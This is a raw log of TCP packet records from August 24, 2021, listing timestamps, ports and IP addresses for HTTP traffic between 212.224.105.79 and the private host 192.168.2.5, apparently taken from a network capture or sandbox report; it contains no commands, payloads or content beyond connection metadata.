Aug 24, 2021 08:49:17.374849081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374855995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374866009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374882936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374893904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374897957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374914885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374929905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374931097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374946117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374953985 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.374962091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374979973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.374998093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375005007 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.375015020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375030994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375041962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.375046968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375062943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375068903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.375078917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375087023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.375096083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375128031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375137091 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.375152111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375170946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375179052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.375188112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.375240088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376491070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376511097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376523972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376552105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376569986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376573086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376590967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376602888 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376609087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376626015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376633883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376645088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376657009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376661062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376674891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376691103 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376692057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376710892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376719952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376724958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376737118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376754999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376773119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376780987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376789093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376812935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376827955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376840115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376854897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376864910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376873016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376888037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376904964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376907110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376924038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376925945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376940966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376956940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376961946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.376974106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.376988888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.377005100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.377010107 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.377022028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.377041101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.377042055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.377058983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.377062082 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.377074957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.377090931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.377105951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.377127886 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.397977114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398025036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398044109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398061037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398081064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398099899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398114920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398132086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398148060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398163080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398179054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398195028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398214102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398231030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398246050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398261070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398278952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398296118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398296118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398313046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398319006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398320913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398323059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398327112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398329020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398329973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398330927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398350954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398355961 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398367882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398384094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398390055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398400068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398408890 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398416996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398432970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398442030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398448944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398464918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398475885 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398488045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398505926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398519993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398521900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398538113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398550034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398554087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398570061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398586035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398602962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398624897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398643970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398659945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398677111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398694992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398699999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398705006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398705959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398709059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398710012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398726940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398735046 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398742914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398758888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398767948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398775101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398791075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398793936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398807049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398823023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398827076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398842096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398859978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398859978 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398875952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398885965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398893118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398910046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398926020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398927927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398941994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398957968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398963928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398976088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.398984909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.398993969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399009943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399018049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399027109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399043083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399050951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399059057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399075031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399091959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399102926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399111032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399142027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399146080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399158955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399163961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399180889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399198055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399204016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399214029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399233103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399239063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399250984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399267912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399274111 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399283886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399302006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399312019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399316072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399333954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399347067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399348974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399368048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399385929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399401903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399419069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399420977 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399426937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399436951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399451017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399454117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399471998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399478912 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399488926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399509907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399513960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399528027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399544001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399559975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399575949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399586916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399591923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399604082 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399609089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399622917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399625063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399643898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399658918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399661064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399677038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399692059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399697065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399709940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399723053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399734974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399746895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399755955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399775028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399781942 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399792910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399811029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399827957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399830103 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399840117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399857044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399867058 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399876118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399893999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399902105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399909973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399926901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399934053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399944067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399956942 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.399960995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399981976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.399996042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400001049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400017023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400029898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400032997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400046110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400065899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400077105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400084019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400100946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400110960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400119066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400130987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400135040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400146961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400162935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400163889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400180101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400197029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400201082 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400213957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400229931 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400229931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400243044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400259972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400269985 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400275946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400293112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400309086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400315046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400333881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400341034 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400352001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400372982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400372982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400389910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400402069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400418997 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400420904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400439978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400450945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400460958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400479078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400496960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400511026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400521040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400523901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400541067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400542974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400559902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400578022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400585890 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400594950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400612116 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400623083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400629997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400648117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400656939 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400671005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400690079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400691986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400708914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400726080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400734901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400743961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400762081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400770903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400779009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400796890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400816917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400820971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400835991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400852919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400865078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400870085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400886059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400887966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400901079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.400917053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.400918007 CEST	80	49712	212.224.105.79	192.168.2.5
